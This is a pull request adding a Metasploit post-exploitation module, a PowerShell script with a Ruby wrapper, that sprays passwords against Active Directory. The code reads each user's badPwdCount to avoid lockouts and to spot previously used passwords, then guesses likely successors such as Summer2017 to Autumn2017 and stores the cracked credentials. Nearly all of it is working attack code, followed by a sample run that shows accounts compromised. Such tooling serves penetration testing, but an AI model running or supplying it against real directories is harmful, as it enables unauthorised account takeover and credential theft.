### PR TITLE
Added new Metasploit post module to spray passwords against AD

### DIFF
--- a/data/post/powershell/Invoke-BadPwdCountScanner.ps1
+++ b/data/post/powershell/Invoke-BadPwdCountScanner.ps1
@@ -192,7 +192,7 @@ Add-Type -TypeDefinition $enum -ErrorAction SilentlyContinue
 
 <#
 .Synopsis
-   Returns value of an attribute of an SearchResult object
+   Returns value of an attribute of a SearchResult object
 .EXAMPLE
    Get-LDAPProperty -sResult <SearchResult> -propertyName <propertyname> -index <0 (default)>
 #>

--- a/data/post/powershell/Invoke-BadPwdCountScanner.ps1
+++ b/data/post/powershell/Invoke-BadPwdCountScanner.ps1
@@ -1,0 +1,495 @@
+# Rename: Invoke-BadPwdCountScanner.ps1
+
+#region AD functions
+
+<#
+.Synopsis
+   Returns all useraccounts with a badpwdcount lower than the given value in the domain of the bindDN.
+.EXAMPLE
+   Get-UserAccounts -bindDN 'LDAP://<DN>' -maxBadPwdCount 5
+#>
+function Get-UserAccounts ([string]$bindDN, [int]$maxBadPwdCount) {
+    
+    $userAccounts = @()
+    
+    # Bind to a global catalog, search all useraccounts throughout the forest and extract all userPrincipalnames 
+    $dirEntry    = New-Object System.DirectoryServices.DirectoryEntry($bindDN)
+    $dirSearcher = New-Object System.DirectoryServices.DirectorySearcher ($dirEntry) 
+    $dirSearcher.Filter = "(&(objectClass=user)(&(sAMAccountName=*)(!sAMAccountName=*$))(badPwdCount<=$maxBadPwdCount))"
+    $dirSearcher.SizeLimit = __pagesize__
+    [void]$dirSearcher.PropertiesToLoad.Add('sAMAccountName')
+    $sResult = $dirSearcher.FindAll()
+
+    # Extract results
+    if (-not $sResult) {
+        Write-Error 'Could not retrieve useraccounts from AD. Check credentials and\or LDAP settings.'
+        return
+    }
+
+    foreach ($acc in $sResult) {
+        $userAccounts += $acc.Properties['sAMAccountName'][0].ToString()        
+    }
+    
+    # cleanup
+    $dirEntry.Dispose()
+    $dirSearcher.Dispose()
+
+    return $userAccounts     
+}
+
+<#
+.Synopsis
+   Performs an LDAP query to retrieve attribute of given useraccount
+.EXAMPLE
+   Get-ADUserAttribute -username <userPrincipalName> -attrname <attributeName> -bindDN <bindDN>
+#>
+function Get-ADUserAttribute ([string]$username, [string]$attrName, [string]$bindDN) {
+   
+    $dirEntry    = New-Object System.DirectoryServices.DirectoryEntry($bindDN)
+    $dirSearcher = New-Object System.DirectoryServices.DirectorySearcher ($dirEntry) 
+    $dirSearcher.Filter = "(&(sAMAccountName=$username))"
+
+    [void]$dirSearcher.PropertiesToLoad.Add($attrName)
+    $sResult = $dirSearcher.FindOne()
+
+    # Extract results
+    if (-not $sResult) {
+        Write-Error 'Could not retrieve useraccount from AD. Check credentials and\or LDAP settings.'
+        return
+    }
+  
+    try {
+        $value = $sResult.Properties[$attrName][0].ToString()
+    } 
+
+    catch {
+        Write-Error 'Cannot find specified attribute'
+        return
+    } 
+
+    finally {
+        # cleanup
+        $dirEntry.Dispose()
+        $dirSearcher.Dispose()
+    }
+
+    return $value
+}
+
+<#
+.Synopsis
+   Retrieves ldap reference to PDCe of the domain of the running context (SYSTEM or user account)
+.EXAMPLE
+   Get-LdapDN
+#>
+function Get-LdapDN {
+
+    # Connect to AD, find domaincontroller with the PDC FSMO role
+    $dirEntry    = New-Object System.DirectoryServices.DirectoryEntry ''
+    $dirSearcher = New-object System.DirectoryServices.DirectorySearcher $dirEntry
+    $dirSearcher.Filter = '(&(objectClass=domainDNS)(fSMORoleOwner=*))'
+    [void]$dirSearcher.PropertiesToLoad.Add('fSMORoleOwner')
+
+    $sResult = $dirSearcher.FindOne()
+    $result  = [string]::Empty
+    if ($sResult) {
+        $roleOwner       = $sResult.Properties['fSMORoleOwner'][0].ToString()
+        $RoleOwnerParent = (New-Object System.DirectoryServices.DirectoryEntry "LDAP://$roleOwner").Parent
+        $pDCFQDN         = (New-Object System.DirectoryServices.DirectoryEntry "$RoleOwnerParent").dnsHostName        
+    } else {
+        Write-Error 'Failed to retrieve primary domain controller. Please check script\computer settings'
+        return
+    }    
+
+    $result = "LDAP://$pDCFQDN/$($dirEntry.distinguishedName)"
+
+    # cleanup
+    if (-not $dirSearcher.Disposed) {
+        $dirSearcher.Dispose()
+    }
+
+    if (-not $dirEntry.Disposed) {
+        $dirEntry.Dispose()
+    }
+
+    return $result
+}
+
+<#
+.Synopsis
+   Tests if username and password are correct
+.EXAMPLE
+   Test-Credential -username <samaccountname> -password <password>
+#>
+function Test-Credential ([string]$username, [string]$password) {
+
+    $result = $false
+    try {
+        $principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext( 
+                [System.DirectoryServices.AccountManagement.ContextType]::Domain)
+
+        $contextOptions = [System.DirectoryServices.AccountManagement.ContextOptions]::Negotiate
+        $result = $principalContext.ValidateCredentials($username, $password, $contextOptions) 
+
+        $principalContext.Dispose()
+    }
+
+    catch {
+    }
+
+    return $result
+}
+
+<#
+.Synopsis
+   Retrieves domainwide password policy of the domain of the running context (SYSTEM or user account)
+.EXAMPLE
+   Get-DomainPasswordPolicy
+#>
+function Get-DomainPasswordPolicy {
+    
+    $dirEntry    = New-Object system.directoryservices.directoryEntry ''
+    $dirSearcher = New-Object System.DirectoryServices.DirectorySearcher $dirEntry 
+    [void]$dirSearcher.PropertiesToLoad.Add('*')    
+    $result = $dirSearcher.Findone()
+
+    $pwdPolicy = New-Object PSObject -Property @{                
+                'Minimum length'          = Get-LDAPProperty -sResult $result -propertyName 'minpwdlength'                
+                'Lockout threshold'       = Get-LDAPProperty -sResult $result -propertyName 'lockoutthreshold'         
+                'Password history length' = Get-LDAPProperty -sResult $result -propertyName 'pwdHistoryLength'
+                'Complexity'              = (Get-LDAPProperty -sResult $result -propertyName 'pwdProperties') -as [pwd.properties]                
+                'Observation window'      = Get-DaysFromTicks -ticks (Get-LDAPProperty -sResult $result -propertyName 'lockoutobservationwindow')
+                'Max password age'        = Get-DaysFromTicks -ticks (Get-LDAPProperty -sResult $result -propertyName 'maxpwdage')                
+                'Min password age'        = Get-DaysFromTicks -ticks (Get-LDAPProperty -sResult $r -propertyName 'minpwdage')                      
+    }
+
+    # Cleanup
+    $dirEntry.dispose()
+    $dirSearcher.Dispose()
+    
+    return $pwdPolicy 
+}
+
+<#
+.Synopsis
+   Enum for pwdproperty value
+   https://technet.microsoft.com/nl-nl/library/ms679431(v=vs.85).aspx
+#>
+$enum = @"
+namespace pwd {
+
+    public enum properties {
+        DOMAIN_PASSWORD_COMPLEX = 1, 
+        DOMAIN_PASSWORD_NO_ANON_CHANGE = 2,
+        DOMAIN_PASSWORD_NO_CLEAR_CHANGE = 4,
+        DOMAIN_LOCKOUT_ADMINS = 8,
+        DOMAIN_PASSWORD_STORE_CLEARTEXT = 16,
+        DOMAIN_REFUSE_PASSWORD_CHANGE = 32
+    }
+}
+"@
+Add-Type -TypeDefinition $enum -ErrorAction SilentlyContinue
+
+<#
+.Synopsis
+   Returns value of an attribute of an SearchResult object
+.EXAMPLE
+   Get-LDAPProperty -sResult <SearchResult> -propertyName <propertyname> -index <0 (default)>
+#>
+function Get-LDAPProperty($sResult, $propertyName, $index = 0) {
+    $rValue = ''
+
+    try {
+        $rValue = $sResult.Properties[$propertyName][$index]
+    }
+    catch {
+    }
+
+    return $rValue
+}
+
+<#
+.Synopsis
+   Returns a human readable number based on ticks.
+.EXAMPLE
+   Get-DaysFromTicks -ticks <ticks>
+#>
+function Get-DaysFromTicks([int64]$ticks){
+
+    if ($ticks -eq [int64]::MinValue) {
+        return 0
+    }
+
+    $days = 0
+    $_ticks = $ticks
+    if ($ticks -lt 0) {
+        $_ticks = [Math]::abs($ticks)
+    }
+    $ts = [System.TimeSpan]::FromTicks($ticks) 
+    return $ts.Days
+}
+
+#endregion
+
+#region Password functions
+
+<#
+.Synopsis
+   Returns season number based on current month
+.EXAMPLE
+   Get-CurrentSeasonNumber
+#>
+function Get-CurrentSeasonNumber {
+
+    $season = 0
+    $now            = [datetime]::Now
+    [float]$value = $now.Month + $now.day / 100
+
+    if ($value -lt 3.21 -or $value -ge 12.22) {
+        $season = 1
+    } elseif ($value -lt 6.21) {
+        $season = 2
+    } elseif ($value -lt 9.23) {
+        $season = 3
+    } else{
+        $season = 4
+    }
+
+    return $season
+}
+
+<#
+.Synopsis
+   Returns the name of the season based on the number. 
+.EXAMPLE
+   Get-SeasonFromNumber -seasonNumber 2 
+#>
+function Get-SeasonFromNumber ($seasonNumber) {
+
+    [string]$season = [string]::Empty
+
+    if ($seasonNumber -eq 1) {
+        $season = 'Winter'
+    } elseif ($seasonNumber -eq 2) {
+        $season = 'Spring'
+    } elseif ($seasonNumber -eq 3) {
+        $season = 'Summer'
+    } else{
+        $season = 'Autumn'
+    }
+
+    return $season
+}
+
+<#
+.Synopsis
+   Returns the number of the season based on the name of the season
+.EXAMPLE
+   Get-NumberFromSeason -season Winter
+#>
+function Get-NumberFromSeason ($season) {
+
+    $seasonNumber = 0
+    $_season = $season.ToLower()
+
+    if ($_season -eq 'winter') {
+        $seasonNumber = 1
+    } elseif ($_season -eq 'spring') {
+        $seasonNumber = 2
+    } elseif ($_season -eq 'summer') {
+        $seasonNumber = 3
+    } elseif ($_season -eq 'autumn') {
+        $seasonNumber = 4
+    }
+    
+    return $seasonNumber
+}
+
+<#
+.Synopsis
+   Increments passwords like winter2017, welcome01, etc
+.DESCRIPTION
+   If the prefix is a season, the season is incremented into the next season.
+   Let's say that the password is Summer2017 then the incremented password will be Autumn2017.
+
+   If the prefix is Welcome01 or anything like that, the returned value will be Welcome02.   
+.EXAMPLE
+   Increment-Password -suffix 01 -prefix welcome
+#>
+function Increment-Password ([int]$suffix, $prefix) {
+    
+    $newPassword = @()
+
+    $seasonRegex = '^winter|spring|summer|autumn'
+    if ($prefix -match $seasonRegex) {
+        $seasonNumber = Get-NumberFromSeason $prefix
+
+        # if it's 4, make it 1 (Herfst). Since winter starts at 21-12, we need to increment the year as well
+        if ($seasonNumber -eq 4) {
+            $suffix++
+            $seasonNumber = 1
+        } else {
+            $seasonNumber++
+        }
+
+        $season = Get-SeasonFromNumber -seasonNumber $seasonNumber
+        $newPassword = @($season,$suffix)
+    } else {
+        $nSuffix = $($suffix++;$suffix)
+        if ($nSuffix -lt 10) {
+            $nSuffix = "0$nSuffix"
+        }
+        #$newPassword = @($prefix,$($suffix++;$suffix))
+        $newPassword = @($prefix,$nSuffix)
+    }
+
+    return $newPassword
+}
+
+<#
+.Synopsis
+   Returns a multidimensional array with passwords. The multidimensional array contains two arrays of prefixes and suffixes of 
+   passwords.
+.EXAMPLE
+   Get-Passwords
+#>
+function Get-Passwords {
+
+    # Generate list with password    
+    $passwordData = '__pwdData__'
+    $passwordsPrefix = @()
+    $passwordsSuffix = @()
+    
+    $_passwords = $passwordData -split ','
+    foreach ($p in $_passwords) {
+        $splits = $p.split('|')
+        $passwordsPrefix += $splits[0]
+        $passwordsSuffix += $splits[1]
+    }
+
+    $passwords = @($passwordsPrefix), @($passwordsSuffix)
+    return $passwords
+}
+
+
+#endregion
+
+
+function Start-Check ($password = 'Welcome01', [switch]$Bruteforce = $false) {
+
+    # Some sanity checks
+    if ([string]::IsNullOrEmpty($password)) {
+           $password = 'Welcome01'
+    }
+
+    # Specify domainController with PDC role in $ldapDN to avoid replication issues
+    $ldapDN = Get-LdapDN
+
+    if (-not $ldapDN) {
+        return    
+    }
+
+    # Get current passwordpolicy
+    $pwdPolicy = Get-DomainPasswordPolicy
+    
+    # Get all useraccounts
+    $userAccounts = Get-UserAccounts -bindDN $ldapDN -maxBadPwdCount ($pwdPolicy.'Lockout threshold' -2)
+
+    if (-not $userAccounts) {
+        return
+    }
+
+    # Iterate through all useraccounts. Test common passwords. If they match it's an instant win.
+    # If not, check if badpwdcount has been incremented after a login with a false password. If it's not, it's a previous
+    # password of the user and we might be able to guess the current one
+    $passwordList = Get-Passwords
+
+    foreach ($userAccount in $userAccounts) {
+        
+        # Get current badPwdCount value for $userAccount. 
+        # If it's equal or 1 incrementation away of getting locked out, we skip the account        
+        $currBadPwdCount = Get-ADUserAttribute -username $userAccount -attrName 'badPwdCount' -bindDN $ldapDN
+        if ($currBadPwdCount -ge $pwdPolicy.'Lockout threshold' -1) {
+            #Write-Host "Lockout threshold almost met: $userAccount" -ForegroundColor Yellow
+            continue
+        }
+
+        if (-not $Bruteforce) {
+            $result = Test-Credential -username $userAccount -password $password
+            if ($result) {
+                Write-Host "[+] $userAccount => $password"
+                continue
+            } 
+
+            # Check if password has been incremented
+            $newBadPwdCount = Get-ADUserAttribute -username $userAccount -attrName 'badPwdCount' -bindDN $ldapDN
+            if (-not $newBadPwdCount){
+                continue
+            }
+
+            if ($currBadPwdCount -eq $newBadPwdCount) {
+                Write-Host "[!] $userAccount => $password"
+            }
+            } else{
+
+                for ($i=0; $i -lt $passwordList[0].Count; $i++){
+
+                    $passPrefix  = $passwordList[0][$i]
+                    $passSuffix  = $passwordList[1][$i]        
+                    $tstPassword = "{0}{1}" -f $passPrefix, $passSuffix
+
+                    $result = Test-Credential -UserName $userAccount -Password $tstPassword 
+                    if ($result) {
+                        Write-Host "[+] $userAccount => $tstPassword"
+                        break
+                    }        
+
+                    # Invalid credentials. Check if badPwdCount has been incremented. If not, increment password and check again
+                    $newBadPwdCount = Get-ADUserAttribute -username $userAccount -attrName 'badPwdCount' -bindDN $ldapDN        
+
+                    if ($newBadPwdCount -eq $currBadPwdCount) {                       
+                                            
+                        # We're on the right track, so we can guess the password for a maximum of two times
+                        for ($j=0; $j -lt 2; $j++) {           
+
+                            # Increment password.
+                            $incrementedPasswordStuff = Increment-Password -suffix $passSuffix -prefix $passPrefix
+                            $passPrefix = $incrementedPasswordStuff[0]
+                            $passSuffix = $incrementedPasswordStuff[1]
+                            $incrementedPassword = "{0}{1}" -f $passPrefix, $passSuffix
+
+                            # Test incremented password
+                            $result = Test-Credential -UserName $userAccount -Password $incrementedPassword 
+
+                            if ($result) {
+                                Write-Host "[*] $userAccount => $incrementedPassword"                                
+                                break
+                            } elseif ($j -eq 0){
+                                Write-Host "[!] $userAccount => $password"
+                            } else{
+                                Write-Host "[!] $userAccount => $incrementedPassword"
+                            }
+
+                            # Too bad. Check if the counter has been incremented. If not, let's try it again.
+                            $currBadPwdCount = $newBadPwdCount
+                            $newBadPwdCount  = Get-ADUserAttribute -username $userAccount -attrName 'badPwdCount' -bindDN $ldapDN  
+
+                            if ($currBadPwdCount -ne $newBadPwdCount) {                                                            
+                                break
+                            }
+                        }           
+                    }
+
+                    # Update currBadPwdCount to the new incremented value
+                    $currBadPwdCount = $newBadPwdCount
+
+                    # Just to be sure, completely clear the $result variable
+                    Remove-Variable result -ErrorAction SilentlyContinue
+                }
+            }
+        }
+} 
+
+Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+
+Start-Check -password __pass__ -Bruteforce:__bruteforce__

--- a/modules/post/windows/gather/badpwdcount_sprayer.rb
+++ b/modules/post/windows/gather/badpwdcount_sprayer.rb
@@ -29,6 +29,10 @@ class MetasploitModule < Msf::Post
         'Author' => [
           'Rindert Kramer <rindert.kramer[at]fox-it.com>',
         ],
+        'References'  =>
+        [
+          ['URL', 'https://blog.fox-it.com/2017/11/28/further-abusing-the-badpwdcount-attribute/']
+        ],
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter']))
 

--- a/modules/post/windows/gather/badpwdcount_sprayer.rb
+++ b/modules/post/windows/gather/badpwdcount_sprayer.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Post
   def initialize(info = {})
     super(update_info(info,
       'Name' => 'BadPwdCount sprayer',
-      'Description' => %{
+      'Description' => %q{
           Because of how Active Directory works, if a user tries to authenticate
           with his previous password or the password before that (n-2), the
           domain controller will not increment the badPwdCount attribute so

--- a/modules/post/windows/gather/badpwdcount_sprayer.rb
+++ b/modules/post/windows/gather/badpwdcount_sprayer.rb
@@ -1,0 +1,163 @@
+require 'msf/core/post/common'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Powershell
+  include Msf::Exploit::Powershell
+  include Msf::Post::Common
+  include Msf::Auxiliary::Report
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'BadPwdCount sprayer',
+      'Description' => %{
+          Because of how Active Directory works, if a user tries to authenticate
+          with his previous password or the password before that (n-2), the
+          domain controller will not increment the badPwdCount attribute so
+          that the user won't get locked out every second of the day when he
+          changes his password. Since this attribute is readable for every user
+          and computer account within the domain, we can query the changes in
+          this attribute. If the value has not been incremented, then we just
+          guessed one of the previous two passwords of the useraccount.
+
+          We can use this information to guess his next/current password. If
+          one of the last two passwords is Summer2017, changes are that his
+          next password will be Autumn2017, etc.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Rindert Kramer <rindert.kramer[at]fox-it.com>',
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter']))
+
+    register_options(
+      [
+        OptString.new('PASSWORD', [true, 'Password to test']),
+        OptBool.new('GUESS_PASSWORD', [false, 'Try to guess the password if badPwdCount has not been incremented', false]),
+        OptString.new('GUESS_PASSWORDS', [false, 'List with passwords, comma seperated. The pipe (|) delimiter seperates the prefix and the suffix. The suffix will be
+          autoincremented.', 'Summer|2017,Welcome|01']),
+        OptInt.new('SCRIPT_TIMEOUT', [true, 'Script timeout', 120]),
+        OptInt.new('LDAP_SIZELIMIT', [true, 'LDAP size limit. Amount of users to query. Set to 0 to query all useraccounts.', 100])
+      ]
+    )
+  end
+
+  def report_cred(creds)
+    # thx: https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb
+
+    # Build service information
+    service_data = {
+      address: session.session_host, # Gives internal IP
+      port: 445,
+      service_name: 'SMB',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    # Iterate through credentials
+    creds.each do |cred|
+      username = cred.split(':')[0]
+      password = cred.split(':')[1]
+
+      realm_value = '.'
+      if realm_value.include? "@"
+        realm_value = username.split('@')[1]
+      end
+
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: refname,
+        private_type: :password,
+        private_data: password,
+        username: username,
+        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+        realm_value: realm_value,
+        module_fullname: fullname
+      }
+
+      credential_data.merge!(service_data)
+      credential_core = create_credential(credential_data)
+
+      login_data = {
+        core: credential_core,
+        last_attempted_at: DateTime.now,
+        status: Metasploit::Model::Login::Status::SUCCESSFUL
+      }
+
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+    end
+  end
+
+  def run
+    # read values from datastore
+    test_password = datastore['PASSWORD']
+    be_brute = datastore['GUESS_PASSWORD']
+    ldap_pagesize = datastore['LDAP_SIZELIMIT']
+    script_timeout = datastore['SCRIPT_TIMEOUT']
+
+    # array for storing credentials
+    credentials = []
+
+    if !have_powershell?
+      print_error('PowerShell is not installed! STOPPING')
+      return
+    end
+    print_status('Powershell is installed. Executing script...')
+
+    # Execute script serverside
+    brutus = '$false'
+    if be_brute
+      brutus = '$true'
+    end
+
+    # Read script, replace placeholders with parameters
+    base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "Invoke-BadPwdCountScanner.ps1"))
+
+    if be_brute
+      if datastore['GUESS_PASSWORDS'].to_s.empty?
+        print_bad('Please specify password to test.')
+        return
+      end
+
+      base_script.gsub! '__pwdData__', datastore['GUESS_PASSWORDS']
+    end
+
+    base_script.gsub! '__pass__', test_password
+    base_script.gsub! '__bruteforce__', brutus
+    base_script.gsub! '__pagesize__', ldap_pagesize.to_s
+
+    eof = Rex::Text.rand_text_alpha(8)
+    cmd_out, _running_pids, _open_channels = execute_script(base_script, script_timeout)
+    ps_output = get_ps_output(cmd_out, eof, script_timeout)
+
+    regex_auth_success = /^\[\+\]\s(?<id>.+)\s\=\>\s(?<pwd>.+)$/
+    regex_pwd_not_incr = /^\[\!\]\s(?<id>.+)\s\=\>\s(?<pwd>.+)$/
+    regex_pwd_guessed = /^\[\*\]\s(?<id>.+)\s\=\>\s(?<pwd>.+)$/
+
+    # print all the successfull authentication attempts
+    ps_output.scan(regex_auth_success).each do |auth_success|
+      credentials << "#{auth_success[0]}:#{auth_success[1]}"
+      print_good("Auth successfull: #{auth_success[0]} => #{auth_success[1]}")
+    end
+
+    print_line('')
+    ps_output.scan(regex_pwd_not_incr).each do |auth_guess|
+      print_warning("BadPwdCount not incremented: #{auth_guess[0]}. Old password: #{auth_guess[1]}")
+    end
+
+    if be_brute
+      print_line('')
+      ps_output.scan(regex_pwd_guessed).each do |auth_lucky|
+        credentials << "#{auth_lucky[0]}:#{auth_lucky[1]}"
+        print_good("Password guessed: #{auth_lucky[0]} => #{auth_lucky[1]}")
+      end
+    end
+
+    # Save credentials in database
+    report_cred(credentials)
+  end
+end


### PR DESCRIPTION
This module does a password spraying attack, but has some additional intelligence builtin like checking the badpwdcount-attribute of every user. 
Since this attribute is not incremented when a user authenticates with his previous password, we can use this information to guess what his current password might be.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Set up an Active Directory environment with user accounts configured with password Welcome01 and Welcome02.
- [ ] `use post/windows/gather/badpwdcount_sprayer`
- [ ] Create meterpreter session on a remote computer. Please make sure that you're using a domain user or if you're .\Administrator on a domain joined computer  to make sure you elevate to SYSTEM.
- [ ] ` run `

`msf > use post/windows/gather/badpwdcount_sprayer`
`msf post(badpwdcount_sprayer) > set session 1`
`session => 1`
`msf post(badpwdcount_sprayer) > set guess_password true`
`guess_password => true`
`msf post(badpwdcount_sprayer) > set password Welcome01`
`password => Welcome01`
`msf post(badpwdcount_sprayer) > run`

`[*] [2017.11.10-18:08:19] Powershell is installed. Executing script...`
`[+] [2017.11.10-18:08:23] Auth successfull: ula.mccoy => Welcome01`

`[!] [2017.11.10-18:08:23] BadPwdCount not incremented: daile.mendoza. Old password: Welcome01`

`[+] [2017.11.10-18:08:23] Password guessed: alane.bell => Welcome02`
`[*] Post module execution completed`

